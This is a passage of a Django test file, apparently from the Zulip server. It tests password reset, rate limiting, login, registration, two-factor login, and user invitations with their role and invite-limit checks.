do_deactivate_realm(user_profile.realm, acting_user=None)
# start the password reset process by supplying an email address
with self.assertLogs(level="INFO") as m:
result = self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(m.output, ["INFO:root:Realm is deactivated"])
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
from django.core.mail import outbox
self.assert_length(outbox, 0)
@override_settings(RATE_LIMITING=True)
def test_rate_limiting(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
from django.core.mail import outbox
add_ratelimit_rule(10, 2, domain="password_reset_form_by_email")
start_time = time.time()
with patch("time.time", return_value=start_time):
self.client_post("/accounts/password/reset/", {"email": email})
self.client_post("/accounts/password/reset/", {"email": email})
self.assert_length(outbox, 2)
# Too many password reset emails sent to the address, we won't send more.
with self.assertLogs(level="INFO") as info_logs:
self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(
info_logs.output,
["INFO:root:Too many password reset attempts for email hamlet@zulip.com"],
)
self.assert_length(outbox, 2)
# Resetting for a different address works though.
self.client_post("/accounts/password/reset/", {"email": self.example_email("othello")})
self.assert_length(outbox, 3)
self.client_post("/accounts/password/reset/", {"email": self.example_email("othello")})
self.assert_length(outbox, 4)
# After time, password reset emails can be sent again.
with patch("time.time", return_value=start_time + 11):
self.client_post("/accounts/password/reset/", {"email": email})
self.client_post("/accounts/password/reset/", {"email": email})
self.assert_length(outbox, 6)
remove_ratelimit_rule(10, 2, domain="password_reset_form_by_email")
def test_wrong_subdomain(self) -> None:
email = self.example_email("hamlet")
# start the password reset process by supplying an email address
result = self.client_post("/accounts/password/reset/", {"email": email}, subdomain="zephyr")
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
body = self.get_reset_mail_body("zephyr")
self.assertIn("Somebody (possibly you) requested a new password", body)
self.assertIn("You do not have an account", body)
self.assertIn(
"active accounts in the following organization(s).\nhttp://zulip.testserver", body
)
self.assertIn("safely ignore", body)
self.assertNotIn("reset your password", body)
self.assertNotIn("deactivated", body)
def test_invalid_subdomain(self) -> None:
email = self.example_email("hamlet")
# start the password reset process by supplying an email address
result = self.client_post(
"/accounts/password/reset/", {"email": email}, subdomain="invalid"
)
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 404)
self.assert_in_response("There is no Zulip organization hosted at this subdomain.", result)
from django.core.mail import outbox
self.assert_length(outbox, 0)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_auth_only(self) -> None:
"""If the email auth backend is not enabled, password reset should do nothing"""
email = self.example_email("hamlet")
with self.assertLogs(level="INFO") as m:
result = self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(
m.output,
[
"INFO:root:Password reset attempted for hamlet@zulip.com even though password auth is disabled."
],
)
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
from django.core.mail import outbox
self.assert_length(outbox, 0)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_and_email_auth(self) -> None:
"""If both email and LDAP auth backends are enabled, limit password
reset to users outside the LDAP domain"""
# If the domain matches, we don't generate an email
with self.settings(LDAP_APPEND_DOMAIN="zulip.com"):
email = self.example_email("hamlet")
with self.assertLogs(level="INFO") as m:
result = self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(
m.output, ["INFO:root:Password reset not allowed for user in LDAP domain"]
)
from django.core.mail import outbox
self.assert_length(outbox, 0)
# If the domain doesn't match, we do generate an email
with self.settings(LDAP_APPEND_DOMAIN="example.com"):
email = self.example_email("hamlet")
result = self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
body = self.get_reset_mail_body()
self.assertIn("reset your password", body)
def test_redirect_endpoints(self) -> None:
"""
These tests are mostly designed to give us 100% URL coverage
in our URL coverage reports. Our mechanism for finding URL
coverage doesn't handle redirects, so we just have a few quick
tests here.
"""
result = self.client_get("/accounts/password/reset/done/")
self.assert_in_success_response(["Check your email"], result)
result = self.client_get("/accounts/password/done/")
self.assert_in_success_response(["We've reset your password!"], result)
result = self.client_get("/accounts/send_confirm/alice@example.com")
self.assert_in_success_response(["/accounts/home/"], result)
result = self.client_get("/accounts/new/send_confirm/alice@example.com")
self.assert_in_success_response(["/new/"], result)
class LoginTest(ZulipTestCase):
"""
Logging in, registration, and logging out.
"""
def test_login(self) -> None:
self.login("hamlet")
user_profile = self.example_user("hamlet")
self.assert_logged_in_user_id(user_profile.id)
def test_login_deactivated_user(self) -> None:
user_profile = self.example_user("hamlet")
do_deactivate_user(user_profile, acting_user=None)
result = self.login_with_return(self.example_email("hamlet"), "xxx")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Your account is no longer active.", result)
self.assert_logged_in_user_id(None)
def test_login_bad_password(self) -> None:
user = self.example_user("hamlet")
password: Optional[str] = "wrongpassword"
result = self.login_with_return(user.delivery_email, password=password)
self.assert_in_success_response([user.delivery_email], result)
self.assert_logged_in_user_id(None)
# Parallel test to confirm that the right password works using the
# same login code, which verifies our failing test isn't broken
# for some other reason.
password = initial_password(user.delivery_email)
result = self.login_with_return(user.delivery_email, password=password)
self.assertEqual(result.status_code, 302)
self.assert_logged_in_user_id(user.id)
@override_settings(RATE_LIMITING_AUTHENTICATE=True)
def test_login_bad_password_rate_limiter(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
add_ratelimit_rule(10, 2, domain="authenticate_by_username")
start_time = time.time()
with patch("time.time", return_value=start_time):
self.login_with_return(email, password="wrongpassword")
self.assert_logged_in_user_id(None)
self.login_with_return(email, password="wrongpassword")
self.assert_logged_in_user_id(None)
# We're over the allowed limit, so the next attempt, even with the correct
# password, will get blocked.
result = self.login_with_return(email)
self.assert_in_success_response(["Try again in 10 seconds"], result)
# After time passes, we should be able to log in.
with patch("time.time", return_value=start_time + 11):
self.login_with_return(email)
self.assert_logged_in_user_id(user_profile.id)
remove_ratelimit_rule(10, 2, domain="authenticate_by_username")
def test_login_with_old_weak_password_after_hasher_change(self) -> None:
user_profile = self.example_user("hamlet")
password = "a_password_of_22_chars"
with self.settings(PASSWORD_HASHERS=("django.contrib.auth.hashers.SHA1PasswordHasher",)):
user_profile.set_password(password)
user_profile.save()
with self.settings(
PASSWORD_HASHERS=(
"django.contrib.auth.hashers.MD5PasswordHasher",
"django.contrib.auth.hashers.SHA1PasswordHasher",
),
PASSWORD_MIN_LENGTH=30,
), self.assertLogs("zulip.auth.email", level="INFO"):
result = self.login_with_return(self.example_email("hamlet"), password)
self.assertEqual(result.status_code, 200)
self.assert_in_response(
"Your password has been disabled because it is too weak.", result
)
self.assert_logged_in_user_id(None)
def test_login_nonexist_user(self) -> None:
result = self.login_with_return("xxx@zulip.com", "xxx")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please enter a correct email and password", result)
self.assert_logged_in_user_id(None)
def test_login_wrong_subdomain(self) -> None:
with self.assertLogs(level="WARNING") as m:
result = self.login_with_return(self.mit_email("sipbtest"), "xxx")
self.assertEqual(
m.output,
[
"WARNING:root:User sipbtest@mit.edu attempted password login to wrong subdomain zulip"
],
)
self.assertEqual(result.status_code, 200)
self.assert_in_response(
"Your Zulip account is not a member of the "
"organization associated with this subdomain.",
result,
)
self.assert_logged_in_user_id(None)
def test_login_invalid_subdomain(self) -> None:
result = self.login_with_return(self.example_email("hamlet"), "xxx", subdomain="invalid")
self.assertEqual(result.status_code, 404)
self.assert_in_response("There is no Zulip organization hosted at this subdomain.", result)
self.assert_logged_in_user_id(None)
def test_register(self) -> None:
reset_emails_in_zulip_realm()
realm = get_realm("zulip")
stream_names = [f"stream_{i}" for i in range(40)]
for stream_name in stream_names:
stream = self.make_stream(stream_name, realm=realm)
DefaultStream.objects.create(stream=stream, realm=realm)
# Clear all the caches.
flush_per_request_caches()
ContentType.objects.clear_cache()
with queries_captured() as queries, cache_tries_captured() as cache_tries:
self.register(self.nonreg_email("test"), "test")
# Ensure the number of queries we make is not O(streams)
self.assert_length(queries, 88)
# We can probably avoid a couple cache hits here, but there doesn't
# seem to be any O(N) behavior. Some of the cache hits are related
# to sending messages, such as getting the welcome bot, looking up
# the alert words for a realm, etc.
self.assert_length(cache_tries, 20)
user_profile = self.nonreg_user("test")
self.assert_logged_in_user_id(user_profile.id)
self.assertFalse(user_profile.enable_stream_desktop_notifications)
def test_register_deactivated(self) -> None:
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_post(
"/accounts/home/", {"email": self.nonreg_email("test")}, subdomain="zulip"
)
self.assertEqual(result.status_code, 302)
self.assertEqual("/accounts/deactivated/", result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user("test")
def test_register_with_invalid_email(self) -> None:
"""
If you try to register with invalid email, you get an invalid email
page
"""
invalid_email = "foo\x00bar"
result = self.client_post("/accounts/home/", {"email": invalid_email}, subdomain="zulip")
self.assertEqual(result.status_code, 200)
self.assertContains(result, "Enter a valid email address")
def test_register_deactivated_partway_through(self) -> None:
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
email = self.nonreg_email("test")
result = self.client_post("/accounts/home/", {"email": email}, subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertNotIn("deactivated", result.url)
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.submit_reg_form_for_user(email, "abcd1234", subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual("/accounts/deactivated/", result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user("test")
def test_login_deactivated_realm(self) -> None:
"""
If you try to log in to a deactivated realm, you get a clear error page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.login_with_return(self.example_email("hamlet"), subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual("/accounts/deactivated/", result.url)
def test_logout(self) -> None:
self.login("hamlet")
# We use the logout API, not self.logout, to make sure we test
# the actual logout code path.
self.client_post("/accounts/logout/")
self.assert_logged_in_user_id(None)
def test_non_ascii_login(self) -> None:
"""
You can log in even if your password contain non-ASCII characters.
"""
email = self.nonreg_email("test")
password = "hümbüǵ"
# Registering succeeds.
self.register(email, password)
user_profile = self.nonreg_user("test")
self.assert_logged_in_user_id(user_profile.id)
self.logout()
self.assert_logged_in_user_id(None)
# Logging in succeeds.
self.logout()
self.login_by_email(email, password)
self.assert_logged_in_user_id(user_profile.id)
@override_settings(TWO_FACTOR_AUTHENTICATION_ENABLED=False)
def test_login_page_redirects_logged_in_user(self) -> None:
"""You will be redirected to the app's main page if you land on the
login page when already logged in.
"""
self.login("cordelia")
response = self.client_get("/login/")
self.assertEqual(response["Location"], "http://zulip.testserver")
def test_options_request_to_login_page(self) -> None:
response = self.client_options("/login/")
self.assertEqual(response.status_code, 200)
@override_settings(TWO_FACTOR_AUTHENTICATION_ENABLED=True)
def test_login_page_redirects_logged_in_user_under_2fa(self) -> None:
"""You will be redirected to the app's main page if you land on the
login page when already logged in.
"""
user_profile = self.example_user("cordelia")
self.create_default_device(user_profile)
self.login("cordelia")
self.login_2fa(user_profile)
response = self.client_get("/login/")
self.assertEqual(response["Location"], "http://zulip.testserver")
def test_start_two_factor_auth(self) -> None:
request = MagicMock(POST={})
with patch("zerver.views.auth.TwoFactorLoginView") as mock_view:
mock_view.as_view.return_value = lambda *a, **k: HttpResponse()
response = start_two_factor_auth(request)
self.assertTrue(isinstance(response, HttpResponse))
def test_do_two_factor_login(self) -> None:
user_profile = self.example_user("hamlet")
self.create_default_device(user_profile)
request = MagicMock()
with patch("zerver.decorator.django_otp.login") as mock_login:
do_two_factor_login(request, user_profile)
mock_login.assert_called_once()
def test_zulip_default_context_does_not_load_inline_previews(self) -> None:
realm = get_realm("zulip")
description = "https://www.google.com/images/srpr/logo4w.png"
realm.description = description
realm.save(update_fields=["description"])
response = self.client_get("/login/")
expected_response = """<p><a href="https://www.google.com/images/srpr/logo4w.png">\
https://www.google.com/images/srpr/logo4w.png</a></p>"""
self.assertEqual(response.context_data["realm_description"], expected_response)
self.assertEqual(response.status_code, 200)
class InviteUserBase(ZulipTestCase):
def check_sent_emails(self, correct_recipients: List[str]) -> None:
from django.core.mail import outbox
self.assert_length(outbox, len(correct_recipients))
email_recipients = [email.recipients()[0] for email in outbox]
self.assertEqual(sorted(email_recipients), sorted(correct_recipients))
if len(outbox) == 0:
return
self.assertIn("Zulip", self.email_display_from(outbox[0]))
self.assertEqual(self.email_envelope_from(outbox[0]), settings.NOREPLY_EMAIL_ADDRESS)
self.assertRegex(
self.email_display_from(outbox[0]), fr" <{self.TOKENIZED_NOREPLY_REGEX}>\Z"
)
self.assertEqual(outbox[0].extra_headers["List-Id"], "Zulip Dev <zulip.testserver>")
def invite(
self,
invitee_emails: str,
stream_names: Sequence[str],
body: str = "",
invite_as: int = PreregistrationUser.INVITE_AS["MEMBER"],
) -> HttpResponse:
"""
Invites the specified users to Zulip with the specified streams.
users should be a string containing the users to invite, comma or
newline separated.
streams should be a list of strings.
"""
stream_ids = []
for stream_name in stream_names:
stream_ids.append(self.get_stream_id(stream_name))
return self.client_post(
"/json/invites",
{
"invitee_emails": invitee_emails,
"stream_ids": orjson.dumps(stream_ids).decode(),
"invite_as": invite_as,
},
)
class InviteUserTest(InviteUserBase):
def test_successful_invite_user(self) -> None:
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login("hamlet")
invitee = "alice-test@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.check_sent_emails([invitee])
def test_newbie_restrictions(self) -> None:
user_profile = self.example_user("hamlet")
invitee = "alice-test@zulip.com"
stream_name = "Denmark"
self.login_user(user_profile)
result = self.invite(invitee, [stream_name])
self.assert_json_success(result)
user_profile.date_joined = timezone_now() - datetime.timedelta(days=10)
user_profile.save()
with self.settings(INVITES_MIN_USER_AGE_DAYS=5):
result = self.invite(invitee, [stream_name])
self.assert_json_success(result)
with self.settings(INVITES_MIN_USER_AGE_DAYS=15):
result = self.invite(invitee, [stream_name])
self.assert_json_error_contains(result, "Your account is too new")
def test_invite_limits(self) -> None:
user_profile = self.example_user("hamlet")
realm = user_profile.realm
stream_name = "Denmark"
# These constants only need to be in descending order
# for this test to trigger an InvitationError based
# on max daily counts.
site_max = 50
realm_max = 40
num_invitees = 30
max_daily_count = 20
daily_counts = [(1, max_daily_count)]
invite_emails = [f"foo-{i:02}@zulip.com" for i in range(num_invitees)]
invitees = ",".join(invite_emails)
self.login_user(user_profile)
realm.max_invites = realm_max
realm.date_created = timezone_now()
realm.save()
def try_invite() -> HttpResponse:
with self.settings(
OPEN_REALM_CREATION=True,
INVITES_DEFAULT_REALM_DAILY_MAX=site_max,
INVITES_NEW_REALM_LIMIT_DAYS=daily_counts,
):
result = self.invite(invitees, [stream_name])
return result
result = try_invite()
self.assert_json_error_contains(result, "enough remaining invites")
# Next show that aggregate limits expire once the realm is old
# enough.
realm.date_created = timezone_now() - datetime.timedelta(days=8)
realm.save()
with queries_captured() as queries:
with cache_tries_captured() as cache_tries:
result = try_invite()
self.assert_json_success(result)
# TODO: Fix large query count here.
#
# TODO: There is some test OTHER than this one
# that is leaking some kind of state change
# that throws off the query count here. It
# is hard to investigate currently (due to
# the large number of queries), so I just
# use an approximate equality check.
actual_count = len(queries)
expected_count = 251
if abs(actual_count - expected_count) > 1:
raise AssertionError(
f"""
Unexpected number of queries:
expected query count: {expected_count}
actual: {actual_count}
"""
)
# Almost all of these cache hits are to re-fetch each one of the
# invitees. These happen inside our queue processor for sending
# confirmation emails, so they are somewhat difficult to avoid.
#
# TODO: Mock the call to queue_json_publish, so we can measure the
# queue impact separately from the user-perceived impact.
self.assert_length(cache_tries, 32)
# Next get line coverage on bumping a realm's max_invites.
realm.date_created = timezone_now()
realm.max_invites = site_max + 10
realm.save()
result = try_invite()
self.assert_json_success(result)
# Finally get coverage on the case that OPEN_REALM_CREATION is False.
with self.settings(OPEN_REALM_CREATION=False):
result = self.invite(invitees, [stream_name])
self.assert_json_success(result)
def test_invite_user_to_realm_on_manual_license_plan(self) -> None:
user = self.example_user("hamlet")
self.login_user(user)
_, ledger = self.subscribe_realm_to_monthly_plan_on_manual_license_management(
user.realm, 50, 50
)
with self.settings(BILLING_ENABLED=True):
result = self.invite(self.nonreg_email("alice"), ["Denmark"])
self.assert_json_success(result)
ledger.licenses_at_next_renewal = 5
ledger.save(update_fields=["licenses_at_next_renewal"])
with self.settings(BILLING_ENABLED=True):
result = self.invite(self.nonreg_email("bob"), ["Denmark"])
self.assert_json_success(result)
ledger.licenses = get_latest_seat_count(user.realm) + 1
ledger.save(update_fields=["licenses"])
with self.settings(BILLING_ENABLED=True):
invitee_emails = self.nonreg_email("bob") + "," + self.nonreg_email("alice")
result = self.invite(invitee_emails, ["Denmark"])
self.assert_json_error_contains(
result, "Your organization does not have enough unused Zulip licenses to invite 2 users"
)
ledger.licenses = get_latest_seat_count(user.realm)
ledger.save(update_fields=["licenses"])
with self.settings(BILLING_ENABLED=True):
result = self.invite(self.nonreg_email("bob"), ["Denmark"])
self.assert_json_error_contains(
result, "All Zulip licenses for this organization are currently in use"
)
def test_cross_realm_bot(self) -> None:
inviter = self.example_user("hamlet")
self.login_user(inviter)
cross_realm_bot_email = "emailgateway@zulip.com"
legit_new_email = "fred@zulip.com"
invitee_emails = ",".join([cross_realm_bot_email, legit_new_email])
result = self.invite(invitee_emails, ["Denmark"])
self.assert_json_error(
result,
"Some of those addresses are already using Zulip,"
+ " so we didn't send them an invitation."
+ " We did send invitations to everyone else!",
)
def test_invite_mirror_dummy_user(self) -> None:
"""
A mirror dummy account is a temporary account
that we keep in our system if we are mirroring
data from something like Zephyr or IRC.
We want users to eventually just sign up or
register for Zulip, in which case we will just
fully "activate" the account.
Here we test that you can invite a person who
has a mirror dummy account.
"""
inviter = self.example_user("hamlet")
self.login_user(inviter)
mirror_user = self.example_user("cordelia")
mirror_user.is_mirror_dummy = True
mirror_user.save()
change_user_is_active(mirror_user, False)
self.assertEqual(
PreregistrationUser.objects.filter(email=mirror_user.email).count(),
0,
)
result = self.invite(mirror_user.email, ["Denmark"])
self.assert_json_success(result)
prereg_user = PreregistrationUser.objects.get(email=mirror_user.email)
self.assertEqual(
prereg_user.referred_by.email,
inviter.email,
)
def test_successful_invite_user_as_owner_from_owner_account(self) -> None:
self.login("desdemona")
invitee = self.nonreg_email("alice")
result = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_OWNER"]
)
self.assert_json_success(result)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertTrue(invitee_profile.is_realm_owner)
self.assertFalse(invitee_profile.is_guest)
def test_invite_user_as_owner_from_admin_account(self) -> None:
self.login("iago")
invitee = self.nonreg_email("alice")
response = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_OWNER"]
)
self.assert_json_error(response, "Must be an organization owner")
def test_successful_invite_user_as_admin_from_admin_account(self) -> None:
self.login("iago")
invitee = self.nonreg_email("alice")
result = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_ADMIN"]
)
self.assert_json_success(result)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertTrue(invitee_profile.is_realm_admin)
self.assertFalse(invitee_profile.is_realm_owner)
self.assertFalse(invitee_profile.is_guest)
def test_invite_user_as_admin_from_normal_account(self) -> None:
self.login("hamlet")
invitee = self.nonreg_email("alice")
response = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_ADMIN"]
)
self.assert_json_error(response, "Must be an organization administrator")
def test_successful_invite_user_as_moderator_from_admin_account(self) -> None:
self.login("iago")
invitee = self.nonreg_email("alice")
result = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["MODERATOR"]
)
self.assert_json_success(result)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertFalse(invitee_profile.is_realm_admin)
self.assertTrue(invitee_profile.is_moderator)
self.assertFalse(invitee_profile.is_guest)
def test_invite_user_as_moderator_from_normal_account(self) -> None:
self.login("hamlet")
invitee = self.nonreg_email("alice")
response = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["MODERATOR"]
)
self.assert_json_error(response, "Must be an organization administrator")
def test_invite_user_as_moderator_from_moderator_account(self) -> None:
self.login("shiva")
invitee = self.nonreg_email("alice")
response = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["MODERATOR"]
)
self.assert_json_error(response, "Must be an organization administrator")
def test_invite_user_as_invalid_type(self) -> None:
"""
Test inviting a user as invalid type of user i.e. type of invite_as
is not in PreregistrationUser.INVITE_AS
"""
self.login("iago")
invitee = self.nonreg_email("alice")
response = self.invite(invitee, ["Denmark"], invite_as=10)
self.assert_json_error(response, "Must be invited as an valid type of user")
def test_successful_invite_user_as_guest_from_normal_account(self) -> None:
self.login("hamlet")
invitee = self.nonreg_email("alice")
self.assert_json_success(
self.invite(invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["GUEST_USER"])
)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertFalse(invitee_profile.is_realm_admin)
self.assertTrue(invitee_profile.is_guest)
def test_successful_invite_user_as_guest_from_admin_account(self) -> None:
self.login("iago")
invitee = self.nonreg_email("alice")
self.assert_json_success(
self.invite(invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["GUEST_USER"])
)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertFalse(invitee_profile.is_realm_admin)
self.assertTrue(invitee_profile.is_guest)
def test_successful_invite_user_with_name(self) -> None:
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login("hamlet")
email = "alice-test@zulip.com"
invitee = f"Alice Test <{email}>"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.check_sent_emails([email])
def test_successful_invite_user_with_name_and_normal_one(self) -> None:
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login("hamlet")
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = f"Alice Test <{email}>, {email2}"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
def test_can_invite_others_to_realm(self) -> None:
def validation_func(user_profile: UserProfile) -> bool:
user_profile.refresh_from_db()
return user_profile.can_invite_others_to_realm()
self.check_has_permission_policies("invite_to_realm_policy", validation_func)
def test_invite_others_to_realm_setting(self) -> None:
"""
The invite_to_realm_policy realm setting works properly.
"""
realm = get_realm("zulip")
do_set_realm_property(
realm, "invite_to_realm_policy", Realm.POLICY_ADMINS_ONLY, acting_user=None
)
self.login("shiva")
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = f"Alice Test <{email}>, {email2}"
self.assert_json_error(
self.invite(invitee, ["Denmark"]),
"Insufficient permission",
)
# Now verify an administrator can do it
self.login("iago")
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
from django.core import mail
mail.outbox = []
do_set_realm_property(
realm, "invite_to_realm_policy", Realm.POLICY_MODERATORS_ONLY, acting_user=None
)
self.login("hamlet")
email = "carol-test@zulip.com"
email2 = "earl-test@zulip.com"
invitee = f"Carol Test <{email}>, {email2}"
self.assert_json_error(
self.invite(invitee, ["Denmark"]),
"Insufficient permission",
)
self.login("shiva")
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
mail.outbox = []
do_set_realm_property(
realm, "invite_to_realm_policy", Realm.POLICY_MEMBERS_ONLY, acting_user=None
)
self.login("polonius")
email = "dave-test@zulip.com"
email2 = "mark-test@zulip.com"
invitee = f"Dave Test <{email}>, {email2}"
self.assert_json_error(self.invite(invitee, ["Denmark"]), "Not allowed for guest users")
self.login("hamlet")
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
mail.outbox = []
do_set_realm_property(
realm, "invite_to_realm_policy", Realm.POLICY_FULL_MEMBERS_ONLY, acting_user=None
)
do_set_realm_property(realm, "waiting_period_threshold", 1000, acting_user=None)
hamlet = self.example_user("hamlet")
hamlet.date_joined = timezone_now() - datetime.timedelta(
days=(realm.waiting_period_threshold - 1)
)
email = "issac-test@zulip.com"
email2 = "steven-test@zulip.com"
invitee = f"Issac Test <{email}>, {email2}"
self.assert_json_error(
self.invite(invitee, ["Denmark"]),
"Insufficient permission",
)
do_set_realm_property(realm, "waiting_period_threshold", 0, acting_user=None)
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
def test_invite_user_signup_initial_history(self) -> None:
"""
Test that a new user invited to a stream receives some initial
history but only from public streams.
"""
self.login("hamlet")
user_profile = self.example_user("hamlet")
private_stream_name = "Secret"
self.make_stream(private_stream_name, invite_only=True)
self.subscribe(user_profile, private_stream_name)
public_msg_id = self.send_stream_message(
self.example_user("hamlet"),
"Denmark",
topic_name="Public topic",
content="Public message",
)
secret_msg_id = self.send_stream_message(
self.example_user("hamlet"),
private_stream_name,
topic_name="Secret topic",
content="Secret message",
)
invitee = self.nonreg_email("alice")
self.assert_json_success(self.invite(invitee, [private_stream_name, "Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
invitee_msg_ids = [
um.message_id for um in UserMessage.objects.filter(user_profile=invitee_profile)
]
self.assertTrue(public_msg_id in invitee_msg_ids)
self.assertFalse(secret_msg_id in invitee_msg_ids)
self.assertFalse(invitee_profile.is_realm_admin)
invitee_msg, signups_stream_msg, inviter_msg, secret_msg = Message.objects.all().order_by(
"-id"
)[0:4]
self.assertEqual(secret_msg.id, secret_msg_id)
self.assertEqual(inviter_msg.sender.email, "notification-bot@zulip.com")
self.assertTrue(
inviter_msg.content.startswith(
f"alice_zulip.com <`{invitee_profile.email}`> accepted your",
)
)
self.assertEqual(signups_stream_msg.sender.email, "notification-bot@zulip.com")
self.assertTrue(
signups_stream_msg.content.startswith(
f"@_**alice_zulip.com|{invitee_profile.id}** just signed up",
)
)
self.assertEqual(invitee_msg.sender.email, "welcome-bot@zulip.com")
self.assertTrue(invitee_msg.content.startswith("Hello, and welcome to Zulip!"))
def test_multi_user_invite(self) -> None:
"""
Invites multiple users with a variety of delimiters.
"""
self.login("hamlet")
# Intentionally use a weird string.
self.assert_json_success(
self.invite(
"""bob-test@zulip.com, carol-test@zulip.com,
dave-test@zulip.com
earl-test@zulip.com""",
["Denmark"],
)
)
for user in ("bob", "carol", "dave", "earl"):
self.assertTrue(find_key_by_email(f"{user}-test@zulip.com"))
self.check_sent_emails(
[
"bob-test@zulip.com",
"carol-test@zulip.com",
"dave-test@zulip.com",
"earl-test@zulip.com",
]
)
def test_max_invites_model(self) -> None:
realm = get_realm("zulip")
self.assertEqual(realm.max_invites, settings.INVITES_DEFAULT_REALM_DAILY_MAX)
realm.max_invites = 3
realm.save()
self.assertEqual(get_realm("zulip").max_invites, 3)
realm.max_invites = settings.INVITES_DEFAULT_REALM_DAILY_MAX
realm.save()
def test_invite_too_many_users(self) -> None:
# Only a light test of this pathway; e.g. doesn't test that
# the limit gets reset after 24 hours
self.login("iago")
invitee_emails = "1@zulip.com, 2@zulip.com"
self.invite(invitee_emails, ["Denmark"])
invitee_emails = ", ".join(str(i) for i in range(get_realm("zulip").max_invites - 1))
self.assert_json_error(
self.invite(invitee_emails, ["Denmark"]),
"You do not have enough remaining invites for today. "
"Please contact desdemona+admin@zulip.com to have your limit raised. "
"No invitations were sent.",
)
def test_missing_or_invalid_params(self) -> None:
"""
Tests inviting with various missing or invalid parameters.
"""
realm = get_realm("zulip")
do_set_realm_property(realm, "emails_restricted_to_domains", True, acting_user=None)
self.login("hamlet")
invitee_emails = "foo@zulip.com"
self.assert_json_error(
self.invite(invitee_emails, []),
"You must specify at least one stream for invitees to join.",
)
for address in ("noatsign.com", "outsideyourdomain@example.net"):
self.assert_json_error(
self.invite(address, ["Denmark"]),
